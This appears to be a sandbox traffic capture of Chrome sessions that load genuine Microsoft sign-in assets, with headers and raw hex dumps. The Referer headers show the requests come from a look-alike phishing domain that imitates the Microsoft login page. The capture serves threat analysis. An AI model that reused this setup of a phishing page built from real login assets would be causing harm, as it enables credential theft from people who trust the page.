                                                                                                                              2024-10-04 13:11:14 UTC16384INData Raw: 30 09 f5 14 35 60 ce f2 fe e8 1a b9 e3 49 f2 26 1c 0f 1f 45 ee 29 dd dd b3 30 20 25 b2 3c 1f 46 65 59 b4 27 33 de a0 d8 84 6d 8d 13 e9 7b 19 fd 2c 29 1a f9 07 fb 09 37 13 1e 81 af e3 38 d7 1a 8a bf c1 36 cf d0 b6 42 7c 9d 14 e0 d0 ef c9 18 43 4d c5 77 71 59 77 8e 86 e0 a6 ee b8 6d 25 93 bb 6e 34 d6 c5 bd 30 36 1f 71 7d 0a 29 8b 9e fd d3 20 11 52 2b a4 a9 df a3 6b 09 78 22 6a b0 e5 b4 03 2f 7f 92 e6 f1 e0 f1 f3 4d 94 b0 19 60 76 9a a7 23 28 93 76 42 3f c6 88 36 5d bb 46 a9 01 63 8f b8 42 99 64 e6 92 d1 19 60 eb 35 2a 5c 4d f2 80 57 d1 4d fa 51 56 f9 b1 c1 12 09 54 6e 43 94 2a ec a1 e3 f3 ac 01 44 68 83 84 57 8d 1f d1 6f d0 8f 2e e0 09 bd 70 82 4f 6d de 88 b3 06 4a 70 95 cf 7f 44 bc d8 56 9c 5a 0d 87 8d 74 00 d3 43 f9 aa 30 27 f7 48 f1 e7 7d 97 ec 41 df 0b
                                                                                                                              Data Ascii: 05`I&E)0 %<FeY'3m{,)786B|CMwqYwm%n406q}) R+kx"j/M`v#(vB?6]FcBd`5*\MWMQVTnC*DhWo.pOmJpDVZtC0'H}A
                                                                                                                              2024-10-04 13:11:14 UTC16384INData Raw: 92 03 92 9f b2 90 ac b0 72 18 98 1e 26 58 4c 56 0d f0 06 7e 5a ea ad 15 59 17 96 6f 16 b5 36 49 01 f9 99 3e cf 46 45 9c df 70 be 0d 1e 85 fe 33 ed 87 06 bf 78 64 42 a2 03 be a2 0f 92 e1 4a 73 fa 08 1a 35 fe 39 bf 8e 9c 9a 34 94 48 08 3d 8d b1 ad 19 96 66 3b 2a ab ae 60 84 ac bf 74 3a b2 04 69 0e a4 71 ea 6c 6a f6 bc a2 fa 6a e1 19 28 41 f3 40 09 7f 2b b7 21 10 05 39 0d 1d 7c e6 ed f6 2e 69 dc 7f 12 45 d1 08 f8 1d b0 cb 41 22 66 e0 e6 cc 3b 69 60 1c 9a 87 30 93 c0 11 da 2c 85 94 58 61 06 19 8a 3d 84 c3 a8 44 19 66 35 9d e2 26 23 96 13 55 97 30 19 53 44 9b 78 fa 7c 5f ca ac 66 f2 68 83 f3 b8 08 91 50 70 67 01 e8 36 d0 56 81 59 a7 1e f1 da 42 be c7 d0 f5 cb a1 83 f4 1b 8c 78 5c 7d a4 db 2b 40 c2 64 41 45 d3 8e 38 d9 b4 4d 48 3b 4f 45 41 18 a2 c3 86 1a c5 b9
                                                                                                                              Data Ascii: r&XLV~ZYo6I>FEp3xdBJs594H=f;*`t:iqljj(A@+!9|.iEA"f;i`0,Xa=Df5&#U0SDx|_fhPpg6VYBx\}+@dAE8MH;OEA
                                                                                                                              2024-10-04 13:11:14 UTC16384INData Raw: 18 b5 fc df b9 b3 94 45 81 eb 67 71 e4 c5 d2 96 22 49 58 94 cb 4c b0 28 ce 61 62 f1 fc 6e 96 f3 6a 37 35 07 4d 19 90 0e 36 3a f0 0d 9c 2a 81 1d 2d 19 4f 04 de 40 c0 62 26 f7 83 e6 5e 0a 2c 13 20 cd dc e3 81 4c 30 87 8e 93 db 32 0b 5c 91 c7 5e 1e 7a fb c1 bd 9a e3 a7 7e 22 5d df 49 b8 cb 58 2c 3d c7 97 b6 cd 93 2c 70 02 11 db 98 d7 fd 90 93 9f 3a 09 d8 4d e0 fb 22 4f a2 38 08 12 4c 58 96 44 61 92 24 79 c0 c1 25 f6 d2 4d 2d a1 52 1b 24 94 3b ae 00 c5 e6 5e 62 fb 89 1b 78 18 4e 90 88 3c b0 59 76 37 ef d3 5a 67 69 ec 70 16 b9 3c 70 d5 bf be c7 38 88 2a 89 73 df 06 52 38 ee dd 1c 76 ab dd 84 86 47 64 11 b8 76 9e 81 ab 4a 3b b4 c1 29 64 ec 05 22 64 36 13 3e 8f f7 43 bc 61 9a f0 50 d8 e0 a2 b6 90 49 06 8e 0a 36 94 83 b5 63 f1 42 3f 12 c1 7e ba 89 0c ee b9 81 88
                                                                                                                              Data Ascii: Egq"IXL(abnj75M6:*-O@b&^, L02\^z~"]IX,=,p:M"O8LXDa$y%M-R$;^bxN<Yv7Zgip<p8*sR8vGdvJ;)d"d6>CaPI6cB?~
                                                                                                                              2024-10-04 13:11:14 UTC16384INData Raw: 12 cf 7f 7a f2 a0 8f d8 ea d9 9b bf ec dc 0e b2 86 d1 dd cf 1b 69 ae d2 87 20 3b f3 54 bf dc e8 39 98 92 df 9b e9 ad fa 56 bd f6 87 4d fd d5 09 2b 7f 60 b4 19 bd 5c 57 63 fe 76 e1 f8 44 e1 4d eb 56 ce cf ca 85 e1 99 6b 46 fe fa e7 2f c7 e3 f0 f9 bc 2a 5f a6 2f 43 db cb df 2e 09 6d 93 6d fc ed 27 a8 4e 67 a6 55 fb 42 bd 32 7c f9 79 ff 5e 15 95 06 f7 79 b3 cf de f6 6c d6 2f ff de 4c d0 b2 e0 66 95 e4 1b c6 df 68 75 5a 49 b2 b6 4b 7e 29 f3 3b 45 7e 35 f5 e6 d3 86 c8 49 f5 b7 f9 e3 52 c8 e7 05 26 bd de 5c da c9 00 69 9a fb 8d 94 9f 7f 52 40 81 90 87 74 8b d8 97 a5 ff fc 53 cd cc 93 55 2e bc 7c 7d 07 9a df 99 8e ee 84 bf bf be 46 ad 7d da 44 8b bf 2a 5a 69 99 a1 14 ea 2f 0c 99 ee a4 4c cf 2a 96 cb f4 2e 3a 75 5d f5 ee aa f5 ae aa eb dd 94 bb a2 7a c9 2e 49 ce
                                                                                                                              Data Ascii: zi ;T9VM+`\WcvDMVkF/*_/C.mm'NgUB2|y^yl/LfhuZIK~);E~5IR&\iR@tSU.|}F}D*Zi/L*.:u]z.I
                                                                                                                              2024-10-04 13:11:14 UTC8303INData Raw: 60 d5 08 91 5e b1 44 5d 0b 2d 94 1e 42 c1 d7 11 0b b1 0e 2a 15 3c 8f e9 63 3a 55 74 59 09 2e b5 00 1f e3 aa bd 03 35 07 6f 63 52 84 e7 2f 6d 92 c1 e9 10 89 6f ae 45 64 ba b3 43 a5 af 97 81 17 65 a6 74 2d 26 19 e0 80 9e a0 b0 1d df 68 09 61 20 c0 85 83 29 61 48 2a cd e5 cf 7e 0c d2 57 4b 07 9f 78 e2 49 14 5d ce 09 3e 99 f3 27 2f 6d 97 38 30 1e 7c b6 e4 cf 4e 38 0a 33 4c d5 40 bd e9 d0 e1 50 24 7f 1e c3 bf b1 06 0f 4e 81 10 48 7c 90 24 91 1b 20 ed 03 48 60 11 18 c0 df 52 33 97 8f 0d 06 a7 3c 12 12 8f 96 45 c9 f6 12 df 00 07 55 bc 63 54 71 cd 81 80 87 c9 0c c9 f0 fc 90 cd e8 24 9c df 9c 84 58 fe 14 b4 11 18 8c a3 2c 8c d0 3b 09 05 72 21 3d 3f 79 c2 e0 8a 58 f5 91 88 53 0a 1e 03 57 fb 24 b5 72 e2 fb 78 24 c9 09 e7 35 b1 e3 10 7d 02 b4 2b ba f2 ef 43 7b 99 5e
                                                                                                                              Data Ascii: `^D]-B*<c:UtY.5ocR/moEdCet-&ha )aH*~WKxI]>'/m80|N83L@P$NH|$ H`R3<EUcTq$X,;r!=?yXSW$rx$5}+C{^


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              50192.168.2.174982513.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:14 UTC653OUTGET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:14 UTC738INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:14 GMT
                                                                                                                              Content-Type: image/x-icon
                                                                                                                              Content-Length: 17174
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Last-Modified: Sun, 18 Oct 2020 03:02:03 GMT
                                                                                                                              ETag: 0x8D8731230C851A6
                                                                                                                              x-ms-request-id: 20de5975-101e-003a-5fe7-0fd92e000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131114Z-15767c5fc55ncqdn59ub6rndq00000000c7g00000000ce3w
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:14 UTC15646INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                                                                                              Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                                                                                              2024-10-04 13:11:14 UTC1528INData Raw: 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22
                                                                                                                              Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              51192.168.2.174982713.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:14 UTC624OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:14 UTC811INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:14 GMT
                                                                                                                              Content-Type: application/x-javascript
                                                                                                                              Content-Length: 5529
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Thu, 15 Aug 2024 17:52:54 GMT
                                                                                                                              ETag: 0x8DCBD531731891C
                                                                                                                              x-ms-request-id: ab5b93cd-601e-0065-3303-161aad000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131114Z-15767c5fc55852fxfeh7csa2dn0000000cfg00000000c2sk
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:14 UTC5529INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ad 5b 7d 77 9b 46 d6 ff 7f 3f 05 62 f7 28 b0 19 63 bb 69 9b 16 97 fa 38 7a 49 d4 da b1 6b c9 ed 66 93 1c 1d 24 46 12 31 02 ca 20 db aa a5 ef fe fc ee 0c 08 24 21 d9 e9 b3 3d a9 31 33 77 ee dc b9 73 df 2f 3e fc 77 ed 1f da bf b5 83 e7 ff a7 75 7b 67 d7 3d ed b2 ad f5 de 75 ae 9b da 15 de 3e 68 ef 2f 7b 9d 46 eb f9 78 68 53 fa bf 37 f1 85 36 f2 03 ae e1 39 70 05 f7 b4 28 d4 a2 44 f3 c3 61 94 c4 51 e2 a6 5c 68 53 fc 4c 7c 37 d0 46 49 34 d5 d2 09 d7 e2 24 fa c2 87 a9 d0 02 5f a4 58 34 e0 41 74 af 19 40 97 78 da 95 9b a4 73 ad 73 65 5a c0 cf 81 cd 1f fb 21 56 0f a3 78 8e df 27 a9 16 46 a9 3f e4 9a 1b 7a 12 5b 80 97 50 70 6d 16 7a 3c d1 ee 27 fe 70 a2 5d f8 c3 24 12 d1 28 d5 12 3e e4 fe 1d 36 11 33 8c af 6f c1 34 37 e1 9a e0 a9 36
                                                                                                                              Data Ascii: [}wF?b(ci8zIkf$F1 $!=13ws/>wu{g=u>h/{FxhS769p(DaQ\hSL|7FI4$_X4At@xsseZ!Vx'F?z[Ppmz<'p]$(>63o476


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              52192.168.2.174982613.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:14 UTC433OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:14 UTC792INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:14 GMT
                                                                                                                              Content-Type: application/x-javascript
                                                                                                                              Content-Length: 116365
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Thu, 15 Aug 2024 17:52:54 GMT
                                                                                                                              ETag: 0x8DCBD5317046A2F
                                                                                                                              x-ms-request-id: 81b58fb2-b01e-0059-76aa-0f336a000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131114Z-15767c5fc55tsfp92w7yna557w0000000cgg00000000grr8
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:14 UTC15592INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ec bd 6b 5b db 48 b6 28 fc 7d ff 0a 5b bb c7 2d b5 0b 63 19 30 44 46 78 48 42 7a 98 49 02 07 c8 f4 f4 10 4f 1e 61 97 b1 12 23 79 74 e1 d2 d8 fb b7 bf 6b ad aa 92 4a b2 0c 26 dd fb 9c 0f ef f4 d3 c1 ba 94 ea 5e eb 7e d9 fc a9 fe 5f b5 9f 6a 1b eb ff 57 3b bf 38 3c bb a8 9d bc ab 5d fc e5 f8 ec 6d ed 14 ee 7e ad 7d 3c b9 38 7e 73 b4 7e 3d d8 28 fe bb 98 f8 71 6d ec 4f 79 0d 7e af bc 98 8f 6a 61 50 0b a3 9a 1f 0c c3 68 16 46 5e c2 e3 da 0d fc 8d 7c 6f 5a 1b 47 e1 4d 2d 99 f0 da 2c 0a bf f2 61 12 d7 a6 7e 9c c0 47 57 7c 1a de d5 4c a8 2e 1a d5 4e bd 28 79 a8 1d 9f 5a 2d a8 9f 43 6d fe b5 1f c0 d7 c3 70 f6 00 d7 93 a4 16 84 89 3f e4 35 2f 18 51 6d 53 b8 09 62 5e 4b 83 11 8f 6a 77 13 7f 38 a9 7d f0 87 51 18 87 e3 a4 16 f1 21 f7 6f
                                                                                                                              Data Ascii: k[H(}[-c0DFxHBzIOa#ytkJ&^~_jW;8<]m~}<8~s~=(qmOy~jaPhF^|oZGM-,a~GW|L.N(yZ-Cmp?5/QmSb^Kjw8}Q!o
                                                                                                                              2024-10-04 13:11:14 UTC16384INData Raw: 49 83 69 74 84 3e 47 59 80 42 9b b2 59 ca d8 88 5e 36 a7 24 f7 af 17 38 0d 53 1c 3e 97 dc 17 24 8a 0d 4a a7 01 95 4d e2 5c ba e4 61 91 1d cc fc 76 23 bb 17 d9 47 55 e3 fb 1d 24 72 d5 75 be 53 62 b7 c3 d2 4d f8 e3 e1 9f 08 fe 94 d8 cb 4c b2 60 93 73 a2 08 7c dd c2 cc 73 9f 8e 83 c4 ee be 3e 32 f9 4f b1 b5 a0 9d 4a e3 1e bb 1b c2 d1 c8 77 a3 9e bf 9f 52 28 74 4a 36 90 30 df 82 5a d0 d6 7a 03 ab 1b c3 71 f0 37 c6 a2 a7 e2 09 4c c4 d8 f5 2d 06 8f 9b b6 66 12 5d 1b ff 14 d3 96 df 40 63 44 2c e6 6f b8 f8 2d c3 e6 72 5b e7 a8 e9 1d a4 c2 f9 71 c3 23 61 49 cf 47 27 27 7f 63 23 57 e2 4e 51 f5 3a 81 a7 93 7d af 37 d1 7a d7 44 92 9b fa 37 81 4e 4d 11 fd 88 ec b6 68 ac 96 e7 17 55 b3 97 4f d5 55 ce e4 46 ae d0 47 c2 99 47 5b 6a a1 db c9 ce 2d d0 71 08 5a 64 11 58 a4
                                                                                                                              Data Ascii: Iit>GYBY^6$8S>$JM\av#GU$ruSbML`s|s>2OJwR(tJ60Zzq7L-f]@cD,o-r[q#aIG''c#WNQ:}7zD7NMhUOUFGG[j-qZdX
                                                                                                                              2024-10-04 13:11:14 UTC16384INData Raw: 69 33 da 9c 35 38 fc d6 d6 60 90 eb 41 a0 12 7b 42 d2 a3 7c 11 42 9b 34 a2 89 fa ac 50 54 6d 90 84 ac 5a 8e c0 f6 f8 15 ad ba d6 15 90 17 54 c3 6f b0 8f f9 f7 1b 9e 4f e9 71 33 74 f5 c0 fd e6 30 a7 21 7d a1 5d 47 f8 42 c3 4d be f3 4f 41 ba 44 02 66 76 07 a0 26 a7 28 74 99 e0 3b c9 b0 c7 62 54 65 49 f7 30 01 73 38 73 93 6f be 83 38 82 66 ee ce ce 1e 6e 0d f8 b1 f5 0c 45 5a dc 2d bb 1e b9 c6 a8 1c a5 3d e7 d3 a7 01 cc 63 fd e7 fc 53 3e 06 6a 35 fc f4 09 4b f4 c5 6e dd 03 86 b1 25 2e c8 49 20 ba c1 d7 11 55 f4 05 62 8b c7 b5 5e f7 e2 9e ef 6c 35 b7 f6 9a 6d 87 5d 61 90 56 d2 75 a6 25 9c a5 be 73 39 49 2f c2 89 c3 06 e9 f4 2e 8b 2f c7 85 ef 7c bc 0d 9f ad 6c b6 da db eb 9b ad cd ed 95 17 51 82 39 5e a0 b7 cf f0 f1 eb 15 f7 97 49 1a 67 29 5a 32 4a cf 61 c8 54
                                                                                                                              Data Ascii: i358`A{B|B4PTmZToOq3t0!}]GBMOADfv&(t;bTeI0s8so8fnEZ-=cS>j5Kn%.I Ub^l5m]aVu%s9I/./|lQ9^Ig)Z2JaT
                                                                                                                              2024-10-04 13:11:14 UTC16384INData Raw: c2 e6 08 96 6a d0 1c 75 d2 c3 bc a3 a2 68 ef 40 82 32 1c 1c 7b 39 fa ab 83 34 35 ee 0e dd d2 bd c6 a3 e3 da f3 7c fa 79 15 5c ca 3e 2f 40 6c be 3a bc e8 78 20 98 f4 2e e0 1d e4 fd 56 63 77 ca ae d9 1d 3a bf 64 68 0d bf 86 7f 8c a4 17 fe f8 eb 7d 5b d4 06 df ab e2 2b 59 bc 90 fa 71 8c 6d 52 7e a4 58 f9 fa 23 e9 ab 86 4c d4 b9 ba f0 c4 a4 6a a5 37 fb c1 26 5b c5 f2 30 9b 42 1c ab 21 ec 3a 8a cc 58 07 52 57 12 27 53 82 ac c7 c9 ad f0 1a cb f1 c6 54 45 5c 89 e4 5c bd 7e 67 7a 48 3c 46 dc 1b 4a 50 ba e3 2e 79 86 a5 3e ca 8a 99 87 ca 6b 17 98 cf 6e 0f 3e 00 68 d3 f7 f1 5f 4f 3b 19 98 1a 87 7b c1 08 f8 63 17 4f 7f ce 0c e0 45 fb 8b 27 9e ee 44 80 27 ce ab 3e 29 12 46 c4 b8 b4 78 ad c9 f6 06 5c b6 37 22 bf 58 45 07 fb 68 b5 36 b5 cb 52 b6 2d b7 eb c7 d3 70 f8 10
                                                                                                                              Data Ascii: juh@2{945|y\>/@l:x .Vcw:dh}[+YqmR~X#Lj7&[0B!:XRW'STE\\~gzH<FJP.y>kn>h_O;{cOE'D'>)Fx\7"XEh6R-p
                                                                                                                              2024-10-04 13:11:14 UTC16384INData Raw: b8 ea f0 0c 5e b3 3c ed 39 82 c4 c7 f0 e9 f8 a9 11 fd ee 03 1a 02 ec ec bc 1e bd 0c cf 82 8f 18 b1 2f f9 88 f8 f5 23 27 ed f9 c8 49 92 e1 1d 56 8c 6e 6f f1 cf 94 ff 2c 77 76 ec 2f 77 7a 98 3c 16 d9 f0 ed 93 db db 13 5b d5 13 9e a8 98 80 40 5f 4f 91 e3 3d 11 94 39 fa 19 ba 7f ca ac ef 0d d6 09 1c 92 46 38 e2 5f c7 49 80 9e 8b 38 eb 6c 85 09 b4 62 9d 5b 1d 47 92 f1 80 12 5a 18 ff 2c 54 bd 88 98 d9 ee e6 6f 4b a0 df 82 eb 90 1a 8e 00 5a 51 5c b0 c2 e5 84 de 2e 50 30 f1 df 6e 0c 8b a6 ae c5 6b 1f 27 c6 89 07 4e c3 78 68 cd f9 b4 db 43 45 68 31 f4 4e bb b0 17 d0 fc 82 4d ac e3 d0 7d d5 09 af 3d bd d4 fe 19 1c c3 e9 22 e3 50 a5 b2 47 17 b0 3f bc 0a d5 2e 75 7a b8 4f b2 1e 67 34 d9 4e 63 97 9f 7b d6 02 d4 b7 02 3a c1 61 cd 3d bd 16 ca 31 da 5e 8c 95 df 45 cb 01
                                                                                                                              Data Ascii: ^<9/#'IVno,wv/wz<[@_O=9F8_I8lb[GZ,ToKZQ\.P0nk'NxhCEh1NM}="PG?.uzOg4Nc{:a=1^E
                                                                                                                              2024-10-04 13:11:14 UTC16384INData Raw: 93 bc 81 d3 83 bc d1 d3 83 6f 9c 02 6a e3 fb cf 03 ef f3 c6 93 51 af 57 f8 d0 5e 5b 41 b8 f6 c6 e1 d5 bf ff 20 b0 d5 6f 1c 43 7a 51 d7 1b c8 5f b4 24 71 d3 9b 0f a9 c9 b3 dd 0b f2 21 90 e4 43 24 09 25 4b 50 0d cf 8c 6f 62 e5 88 72 b3 63 51 46 52 e9 a5 cc 3b 9c 98 a6 0a 38 4d 85 3e df 95 f8 88 93 19 59 81 f6 42 13 0b 3c a8 2b 2c 2d 59 af b6 22 6e 07 b3 d5 11 28 e7 e0 30 d6 1d 1f c9 39 a8 6e 32 07 6f ac 59 1e 59 61 06 62 7c 2e 46 48 49 7c f6 91 70 d4 91 9b 81 f1 18 46 32 48 1c 20 d2 22 15 56 dd 08 24 98 bd d5 e8 1b 4f 8d 4c 62 15 e0 46 85 7d 25 72 e1 38 5e 7e 87 07 db e6 9f 6c e6 7d 32 ab ec c2 0d 57 35 d2 59 01 79 ee 6f 72 13 0d 85 da 8b c2 83 6c d0 0b 34 66 a5 dd 0c f0 9d ab f8 24 00 73 8c 07 b4 02 92 4b d5 b1 75 17 96 0e b3 72 50 0e 90 16 c6 12 14 96 41
                                                                                                                              Data Ascii: ojQW^[A oCzQ_$q!C$%KPobrcQFR;8M>YB<+,-Y"n(09n2oYYab|.FHI|pF2H "V$OLbF}%r8^~l}2W5Yyorl4f$sKurPA
                                                                                                                              2024-10-04 13:11:14 UTC16384INData Raw: 36 60 5b ac 09 30 f3 65 fb ce f6 e7 38 a2 0d 16 84 de c9 87 1f 4f 4a f8 36 33 60 db bc f3 8d 03 e9 66 d1 90 42 cf a6 8c fd 73 20 33 13 e0 aa f5 a5 40 6e 98 1e 23 65 91 c8 1f 22 65 95 88 25 a6 ed 09 b2 32 48 8d e5 00 61 76 8c 6d 19 c2 5e e8 e8 5e 3a 68 05 64 8e e3 55 ad b0 7d a3 83 90 da 2a 86 89 ff 9d c7 b5 4c 3e b3 9f 90 23 3f b5 f8 ac 9f a3 69 ac a8 c9 d7 f0 d0 a1 31 ea b0 ea 38 1e fd 81 54 43 6a 1c c9 64 bf 17 8b 88 be 28 f5 24 4f 23 ba 05 68 c1 47 42 db e7 a1 13 f6 2b fb 9b 6e 7b fe 7a ee ac 7b ca 26 59 1f ca 92 10 03 1c 99 6d 00 76 75 8c 2b c5 8d 05 8e f2 dd 2e 95 2d ec ca 58 d9 6b fb 4e 66 a6 cd 1d 6c b8 21 f1 95 ff f2 7e 8c bb ce 0d 00 36 ef 3f bd f7 5f 1e 44 1d cd 79 b1 33 af ad 20 dc 62 0c f8 da ff d2 10 b6 5d 8b f8 dd ff 09 a0 f2 fc 73 ab 3f de
                                                                                                                              Data Ascii: 6`[0e8OJ63`fBs 3@n#e"e%2Havm^^:hdU}*L>#?i18TCjd($O#hGB+n{z{&Ymvu+.-XkNfl!~6?_Dy3 b]s?
